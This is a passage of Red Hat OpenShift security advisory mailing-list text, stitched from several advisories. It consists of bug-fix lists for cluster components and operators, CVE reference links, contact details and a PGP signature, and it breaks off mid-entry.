1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving 'verified: false' even for verified updates 1916401 - Deleting an ingress controller with a bad DNS Record hangs 1916417 - [Kuryr] Must-gather does not have all Custom Resources information 1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image 1916454 - teach CCO about upgradeability from 4.6 to 4.7 1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation 1916502 - Boot disk mirroring fails with mdadm error 1916524 - Two rootdisk shows on storage step 1916580 - Default yaml is broken for VM and VM template 1916621 - oc adm node-logs examples are wrong 1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret. 1916692 - Possibly fails to destroy LB and thus cluster 1916711 - Update Kube dependencies in MCO to 1.20.0 1916747 - remove links to quick starts if virtualization operator isn't updated to 2.6 1916764 - editing a workload with no application applied, will auto fill the app 1916834 - Pipeline Metrics - Text Updates 1916843 - collect logs from openshift-sdn-controller pod 1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed 1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually 1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited 1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error "Forbidden: cannot specify lbFloatingIP and apiFloatingIP together" 1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace 1917101 - [UPI on oVirt] - 'RHCOS image' topic isn't located in the right place in UPI document 1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to '"ProxyConfigController" controller failed to sync "key"' error 1917117 - Common templates - disks screen: invalid disk name 1917124 - Custom template - clone existing PVC - the name of the target VM's data volume is hard-coded; only one VM can be created 1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator 1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. 1917148 - [oVirt] Consume 23-10 ovirt sdk 1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened 1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console 1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory 1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7 1917327 - annotations.message maybe wrong for NTOPodsNotReady alert 1917367 - Refactor periodic.go 1917371 - Add docs on how to use the built-in profiler 1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console 1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui 1917484 - [BM][IPI] Failed to scale down machineset 1917522 - Deprecate --filter-by-os in oc adm catalog mirror 1917537 - controllers continuously busy reconciling operator 1917551 - use min_over_time for vsphere prometheus alerts 1917585 - OLM Operator install page missing i18n 1917587 - Manila CSI operator becomes degraded if user doesn't have permissions to list share types 1917605 - Deleting an exgw causes pods to no longer route to other exgws 1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API 1917656 - Add to Project/application for eventSources from topology shows 404 1917658 - Show TP badge for sources powered by camel connectors in create flow 1917660 - Editing parallelism of job get error info 1917678 - Could not provision pv when no symlink and target found on rhel worker 1917679 - Hide double CTA in admin pipelineruns tab 1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster. 1917759 - Console operator panics after setting plugin that does not exists to the console-operator config 1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0 1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0 1917799 - Gather s list of names and versions of installed OLM operators 1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error 1917814 - Show Broker create option in eventing under admin perspective 1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types 1917872 - [oVirt] rebase on latest SDK 2021-01-12 1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image 1917938 - upgrade version of dnsmasq package 1917942 - Canary controller causes panic in ingress-operator 1918019 - Undesired scrollbars in markdown area of QuickStart 1918068 - Flaky olm integration tests 1918085 - reversed name of job and namespace in cvo log 1918112 - Flavor is not editable if a customize VM is created from cli 1918129 - Update IO sample archive with missing resources & remove IP anonymization from clusteroperator resources 1918132 - i18n: Volume Snapshot Contents menu is not translated 1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2 1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn't be installed on OSP 1918153 - When `&` character is set as an environment variable in a build config it is getting converted as `\u0026` 1918185 - Capitalization on PLR details page 1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections 1918318 - Kamelet connector's are not shown in eventing section under Admin perspective 1918351 - Gather SAP configuration (SCC & ClusterRoleBinding) 1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews 1918395 - [ovirt] increase livenessProbe period 1918415 - MCD nil pointer on dropins 1918438 - [ja_JP, zh_CN] Serverless i18n misses 1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig 1918471 - CustomNoUpgrade Feature gates are not working correctly 1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk 1918622 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART 1918623 - Updating ose-jenkins-agent-nodejs-12 builder & base images to be consistent with ART 1918625 - Updating ose-jenkins-agent-nodejs-10 builder & base images to be consistent with ART 1918635 - Updating openshift-jenkins-2 builder & base images to be consistent with ART #1197 1918639 - Event listener with triggerRef crashes the console 1918648 - Subscription page doesn't show InstallPlan correctly 1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack 1918748 - helmchartrepo is not http(s)_proxy-aware 1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI 1918803 - Need dedicated details page w/ global config breadcrumbs for 'KnativeServing' plugin 1918826 - Insights popover icons are not horizontally aligned 1918879 - need better debug for bad pull secrets 1918958 - The default NMstate instance from the operator is incorrect 1919097 - Close bracket ")" missing at the end of the sentence in the UI 1919231 - quick search modal cut off on smaller screens 1919259 - Make "Add x" singular in Pipeline Builder 1919260 - VM Template list actions should not wrap 1919271 - NM prepender script doesn't support systemd-resolved 1919341 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART 1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry 1919379 - dotnet logo out of date 1919387 - Console login fails with no error when it can't write to localStorage 1919396 - A11y Violation: svg-img-alt on Pod Status ring 1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren't verified 1919750 - Search InstallPlans got Minified React error 1919778 - Upgrade is stuck in insights operator Degraded with "Source clusterconfig could not be retrieved" until insights operator pod is manually deleted 1919823 - OCP 4.7 Internationalization Chinese tranlate issue 1919851 - Visualization does not render when Pipeline & Task share same name 1919862 - The tip information for `oc new-project --skip-config-write` is wrong 1919876 - VM created via customize wizard cannot inherit template's PVC attributes 1919877 - Click on KSVC breaks with white screen 1919879 - The toolbox container name is changed from 'toolbox-root' to 'toolbox-' in a chroot environment 1919945 - user entered name value overridden by default value when selecting a git repository 1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference 1919970 - NTO does not update when the tuned profile is updated. 1919999 - Bump Cluster Resource Operator Golang Versions 1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration 1920200 - user-settings network error results in infinite loop of requests 1920205 - operator-registry e2e tests not working properly 1920214 - Bump golang to 1.15 in cluster-resource-override-admission 1920248 - re-running the pipelinerun with pipelinespec crashes the UI 1920320 - VM template field is "Not available" if it's created from common template 1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode` 1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs 1920390 - Monitoring > Metrics graph shifts to the left when clicking the "Stacked" option and when toggling data series lines on / off 1920426 - Egress Router CNI OWNERS file should have ovn-k team members 1920427 - Need to update `oc login` help page since we don't support prompt interactively for the username 1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time 1920438 - openshift-tuned panics on turning debugging on/off. 1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn 1920481 - kuryr-cni pods using unreasonable amount of CPU 1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof 1920524 - Topology graph crashes adding Open Data Hub operator 1920526 - catalog operator causing CPU spikes and bad etcd performance 1920551 - Boot Order is not editable for Templates in "openshift" namespace 1920555 - bump cluster-resource-override-admission api dependencies 1920571 - fcp multipath will not recover failed paths automatically 1920619 - Remove default scheduler profile value 1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present 1920674 - MissingKey errors in bindings namespace 1920684 - Text in language preferences modal is misleading 1920695 - CI is broken because of bad image registry reference in the Makefile 1920756 - update generic-admission-server library to get the system:masters authorization optimization 1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for "network-check-target" failed when "defaultNodeSelector" is set 1920771 - i18n: Delete persistent volume claim drop down is not translated 1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI 1920912 - Unable to power off BMH from console 1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by "2" 1920984 - [e2e][automation] some menu items names are out dated 1921013 - Gather PersistentVolume definition (if any) used in image registry config 1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior) 1921087 - 'start next quick start' link doesn't work and is unintuitive 1921088 - test-cmd is failing on volumes.sh pretty consistently 1921248 - Clarify the kubelet configuration cr description 1921253 - Text filter default placeholder text not internationalized 1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window 1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo 1921277 - Fix Warning and Info log statements to handle arguments 1921281 - oc get -o yaml --export returns "error: unknown flag: --export" 1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn't exist 1921556 - [OCS with Vault]: OCS pods didn't comeup after deploying with Vault details from UI 1921572 - For external source (i.e GitHub Source) form view as well shows yaml 1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass 1921610 - Pipeline metrics font size inconsistency 1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1921655 - [OSP] Incorrect error handling during cloudinfo generation 1921713 - [e2e][automation] fix failing VM migration tests 1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view 1921774 - delete application modal errors when a resource cannot be found 1921806 - Explore page APIResourceLinks aren't i18ned 1921823 - CheckBoxControls not internationalized 1921836 - AccessTableRows don't internationalize "User" or "Group" 1921857 - Test flake when hitting router in e2e tests due to one router not being up to date 1921880 - Dynamic plugins are not initialized on console load in production mode 1921911 - Installer PR #4589 is causing leak of IAM role policy bindings 1921921 - "Global Configuration" breadcrumb does not use sentence case 1921949 - Console bug - source code URL broken for gitlab self-hosted repositories 1921954 - Subscription-related constraints in ResolutionFailed events are misleading 1922015 - buttons in modal header are invisible on Safari 1922021 - Nodes terminal page 'Expand' 'Collapse' button not translated 1922050 - [e2e][automation] Improve vm clone tests 1922066 - Cannot create VM from custom template which has extra disk 1922098 - Namespace selection dialog is not closed after select a namespace 1922099 - Updated Readme documentation for QE code review and setup 1922146 - Egress Router CNI doesn't have logging support. 1922267 - Collect specific ADFS error 1922292 - Bump RHCOS boot images for 4.7 1922454 - CRI-O doesn't enable pprof by default 1922473 - reconcile LSO images for 4.8 1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace 1922782 - Source registry missing docker:// in yaml 1922907 - Interop UI Tests - step implementation for updating feature files 1922911 - Page crash when click the "Stacked" checkbox after clicking the data series toggle buttons 1922991 - "verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build" test fails on OKD 1923003 - WebConsole Insights widget showing "Issues pending" when the cluster doesn't report anything 1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources 1923102 - [vsphere-problem-detector-operator] pod's version is not correct 1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot 1923674 - k8s 1.20 vendor dependencies 1923721 - PipelineRun running status icon is not rotating 1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios 1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator 1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator 1923874 - Unable to specify values with % in kubeletconfig 1923888 - Fixes error metadata gathering 1923892 - Update arch.md after refactor. 1923894 - "installed" operator status in operatorhub page does not reflect the real status of operator 1923895 - Changelog generation. 1923911 - [e2e][automation] Improve tests for vm details page and list filter 1923945 - PVC Name and Namespace resets when user changes os/flavor/workload 1923951 - EventSources shows `undefined` in project 1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins 1924046 - Localhost: Refreshing on a Project removes it from nav item urls 1924078 - Topology quick search View all results footer should be sticky. 1924081 - NTO should ship the latest Tuned daemon release 2.15 1924084 - backend tests incorrectly hard-code artifacts dir 1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build 1924135 - Under sufficient load, CRI-O may segfault 1924143 - Code Editor Decorator url is broken for Bitbucket repos 1924188 - Language selector dropdown doesn't always pre-select the language 1924365 - Add extra disk for VM which use boot source PXE 1924383 - Degraded network operator during upgrade to 4.7.z 1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box. 1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on 1924583 - Deprectaed templates are listed in the Templates screen 1924870 - pick upstream pr#96901: plumb context with request deadline 1924955 - Images from Private external registry not working in deploy Image 1924961 - k8sutil.TrimDNS1123Label creates invalid values 1924985 - Build egress-router-cni for both RHEL 7 and 8 1925020 - Console demo plugin deployment image shoult not point to dockerhub 1925024 - Remove extra validations on kafka source form view net section 1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running 1925072 - NTO needs to ship the current latest stalld v1.7.0 1925163 - Missing info about dev catalog in boot source template column 1925200 - Monitoring Alert icon is missing on the workload in Topology view 1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1 1925319 - bash syntax error in configure-ovs.sh script 1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data 1925516 - Pipeline Metrics Tooltips are overlapping data 1925562 - Add new ArgoCD link from GitOps application environments page 1925596 - Gitops details page image and commit id text overflows past card boundary 1926556 - 'excessive etcd leader changes' test case failing in serial job because prometheus data is wiped by machine set test 1926588 - The tarball of operator-sdk is not ready for ocp4.7 1927456 - 4.7 still points to 4.6 catalog images 1927500 - API server exits non-zero on 2 SIGTERM signals 1929278 - Monitoring workloads using too high a priorityclass 1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api 1929920 - Cluster monitoring documentation link is broken - 404 not found 5. References: https://access.redhat.com/security/cve/CVE-2018-10103 https://access.redhat.com/security/cve/CVE-2018-10105 https://access.redhat.com/security/cve/CVE-2018-14461 https://access.redhat.com/security/cve/CVE-2018-14462 https://access.redhat.com/security/cve/CVE-2018-14463 https://access.redhat.com/security/cve/CVE-2018-14464 https://access.redhat.com/security/cve/CVE-2018-14465 https://access.redhat.com/security/cve/CVE-2018-14466 https://access.redhat.com/security/cve/CVE-2018-14467 https://access.redhat.com/security/cve/CVE-2018-14468 https://access.redhat.com/security/cve/CVE-2018-14469 https://access.redhat.com/security/cve/CVE-2018-14470 https://access.redhat.com/security/cve/CVE-2018-14553 https://access.redhat.com/security/cve/CVE-2018-14879 https://access.redhat.com/security/cve/CVE-2018-14880 https://access.redhat.com/security/cve/CVE-2018-14881 https://access.redhat.com/security/cve/CVE-2018-14882 https://access.redhat.com/security/cve/CVE-2018-16227 https://access.redhat.com/security/cve/CVE-2018-16228 https://access.redhat.com/security/cve/CVE-2018-16229 https://access.redhat.com/security/cve/CVE-2018-16230 https://access.redhat.com/security/cve/CVE-2018-16300 https://access.redhat.com/security/cve/CVE-2018-16451 https://access.redhat.com/security/cve/CVE-2018-16452 https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2019-3884 https://access.redhat.com/security/cve/CVE-2019-5018 https://access.redhat.com/security/cve/CVE-2019-6977 https://access.redhat.com/security/cve/CVE-2019-6978 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-9455 https://access.redhat.com/security/cve/CVE-2019-9458 https://access.redhat.com/security/cve/CVE-2019-11068 https://access.redhat.com/security/cve/CVE-2019-12614 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13225 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15165 https://access.redhat.com/security/cve/CVE-2019-15166 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-15917 https://access.redhat.com/security/cve/CVE-2019-15925 https://access.redhat.com/security/cve/CVE-2019-16167 https://access.redhat.com/security/cve/CVE-2019-16168 https://access.redhat.com/security/cve/CVE-2019-16231 https://access.redhat.com/security/cve/CVE-2019-16233 https://access.redhat.com/security/cve/CVE-2019-16935 https://access.redhat.com/security/cve/CVE-2019-17450 https://access.redhat.com/security/cve/CVE-2019-17546 https://access.redhat.com/security/cve/CVE-2019-18197 https://access.redhat.com/security/cve/CVE-2019-18808 https://access.redhat.com/security/cve/CVE-2019-18809 https://access.redhat.com/security/cve/CVE-2019-19046 https://access.redhat.com/security/cve/CVE-2019-19056 https://access.redhat.com/security/cve/CVE-2019-19062 https://access.redhat.com/security/cve/CVE-2019-19063 https://access.redhat.com/security/cve/CVE-2019-19068 https://access.redhat.com/security/cve/CVE-2019-19072 https://access.redhat.com/security/cve/CVE-2019-19221 https://access.redhat.com/security/cve/CVE-2019-19319 https://access.redhat.com/security/cve/CVE-2019-19332 https://access.redhat.com/security/cve/CVE-2019-19447 https://access.redhat.com/security/cve/CVE-2019-19524 https://access.redhat.com/security/cve/CVE-2019-19533 https://access.redhat.com/security/cve/CVE-2019-19537 https://access.redhat.com/security/cve/CVE-2019-19543 https://access.redhat.com/security/cve/CVE-2019-19602 https://access.redhat.com/security/cve/CVE-2019-19767 https://access.redhat.com/security/cve/CVE-2019-19770 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20054 https://access.redhat.com/security/cve/CVE-2019-20218 https://access.redhat.com/security/cve/CVE-2019-20386 https://access.redhat.com/security/cve/CVE-2019-20387 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20636 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-20812 https://access.redhat.com/security/cve/CVE-2019-20907 https://access.redhat.com/security/cve/CVE-2019-20916 https://access.redhat.com/security/cve/CVE-2020-0305 https://access.redhat.com/security/cve/CVE-2020-0444 https://access.redhat.com/security/cve/CVE-2020-1716 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-1751 https://access.redhat.com/security/cve/CVE-2020-1752 https://access.redhat.com/security/cve/CVE-2020-1971 https://access.redhat.com/security/cve/CVE-2020-2574 https://access.redhat.com/security/cve/CVE-2020-2752 https://access.redhat.com/security/cve/CVE-2020-2922 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3898 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-6405 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/cve/CVE-2020-7774 https://access.redhat.com/security/cve/CVE-2020-8177 https://access.redhat.com/security/cve/CVE-2020-8492 https://access.redhat.com/security/cve/CVE-2020-8563 https://access.redhat.com/security/cve/CVE-2020-8566 https://access.redhat.com/security/cve/CVE-2020-8619 https://access.redhat.com/security/cve/CVE-2020-8622 https://access.redhat.com/security/cve/CVE-2020-8623 https://access.redhat.com/security/cve/CVE-2020-8624 https://access.redhat.com/security/cve/CVE-2020-8647 https://access.redhat.com/security/cve/CVE-2020-8648 https://access.redhat.com/security/cve/CVE-2020-8649 https://access.redhat.com/security/cve/CVE-2020-9327 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-10029 https://access.redhat.com/security/cve/CVE-2020-10732 https://access.redhat.com/security/cve/CVE-2020-10749 https://access.redhat.com/security/cve/CVE-2020-10751 https://access.redhat.com/security/cve/CVE-2020-10763 https://access.redhat.com/security/cve/CVE-2020-10773 https://access.redhat.com/security/cve/CVE-2020-10774 https://access.redhat.com/security/cve/CVE-2020-10942 https://access.redhat.com/security/cve/CVE-2020-11565 https://access.redhat.com/security/cve/CVE-2020-11668 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-12465 https://access.redhat.com/security/cve/CVE-2020-12655 https://access.redhat.com/security/cve/CVE-2020-12659 https://access.redhat.com/security/cve/CVE-2020-12770 https://access.redhat.com/security/cve/CVE-2020-12826 https://access.redhat.com/security/cve/CVE-2020-13249 https://access.redhat.com/security/cve/CVE-2020-13630 https://access.redhat.com/security/cve/CVE-2020-13631 https://access.redhat.com/security/cve/CVE-2020-13632 https://access.redhat.com/security/cve/CVE-2020-14019 https://access.redhat.com/security/cve/CVE-2020-14040 https://access.redhat.com/security/cve/CVE-2020-14381 https://access.redhat.com/security/cve/CVE-2020-14382 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-14422 https://access.redhat.com/security/cve/CVE-2020-15157 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-15862 https://access.redhat.com/security/cve/CVE-2020-15999 https://access.redhat.com/security/cve/CVE-2020-16166 https://access.redhat.com/security/cve/CVE-2020-24490 https://access.redhat.com/security/cve/CVE-2020-24659 https://access.redhat.com/security/cve/CVE-2020-25211 https://access.redhat.com/security/cve/CVE-2020-25641 https://access.redhat.com/security/cve/CVE-2020-25658 https://access.redhat.com/security/cve/CVE-2020-25661 https://access.redhat.com/security/cve/CVE-2020-25662 https://access.redhat.com/security/cve/CVE-2020-25681 https://access.redhat.com/security/cve/CVE-2020-25682 https://access.redhat.com/security/cve/CVE-2020-25683 https://access.redhat.com/security/cve/CVE-2020-25684 https://access.redhat.com/security/cve/CVE-2020-25685 https://access.redhat.com/security/cve/CVE-2020-25686 https://access.redhat.com/security/cve/CVE-2020-25687 https://access.redhat.com/security/cve/CVE-2020-25694 https://access.redhat.com/security/cve/CVE-2020-25696 https://access.redhat.com/security/cve/CVE-2020-26160 https://access.redhat.com/security/cve/CVE-2020-27813 https://access.redhat.com/security/cve/CVE-2020-27846 https://access.redhat.com/security/cve/CVE-2020-28362 https://access.redhat.com/security/cve/CVE-2020-29652 https://access.redhat.com/security/cve/CVE-2021-2007 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T lmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H EmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8 4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4 mWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL ISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy Ae5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk 4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM uR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG krzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv RjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6 McvuEaxco7U= =sw8i -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Bug Fix(es): * Aggregator pod tries to parse ConfigMaps without results (BZ#1899479) * The compliancesuite object returns error with ocp4-cis tailored profile (BZ#1902251) * The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object (BZ#1902634) * [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object (BZ#1907414) * The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator (BZ#1908991) * Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" (BZ#1909081) * [OCP v46] Always update the default profilebundles on Compliance operator startup (BZ#1909122) 3. Bugs fixed (https://bugzilla.redhat.com/): 1899479 - Aggregator pod tries to parse ConfigMaps without results 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902251 - The compliancesuite object returns error with ocp4-cis tailored profile 1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object 1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object 1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator 1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" 1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup 5. Bugs fixed (https://bugzilla.redhat.com/): 1823765 - nfd-workers crash under an ipv6 environment 1838802 - mysql8 connector from operatorhub does not work with metering operator 1838845 - Metering operator can't connect to postgres DB from Operator Hub 1841883 - namespace-persistentvolumeclaim-usage query returns unexpected values 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1868294 - NFD operator does not allow customisation of nfd-worker.conf 1882310 - CVE-2020-24750 jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration 1890672 - NFD is missing a build flag to build correctly 1890741 - path to the CA trust bundle ConfigMap is broken in report operator 1897346 - NFD worker pods not scheduler on a 3 node master/worker cluster 1898373 - Metering operator failing upgrade from 4.4 to 4.6 channel 1900125 - FIPS error while generating RSA private key for CA 1906129 - OCP 4.7: Node Feature Discovery (NFD) Operator in CrashLoopBackOff when deployed from OperatorHub 1908492 - OCP 4.7: Node Feature Discovery (NFD) Operator Custom Resource Definition file in olm-catalog is not in sync with the one in manifests dir leading to failed deployment from OperatorHub 1913837 - The CI and ART 4.7 metering images are not mirrored 1914869 - OCP 4.7 NFD - Operand configuration options for NodeFeatureDiscovery are empty, no supported image for ppc64le 1916010 - olm skip range is set to the wrong range 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923998 - NFD Operator is failing to update and remains in 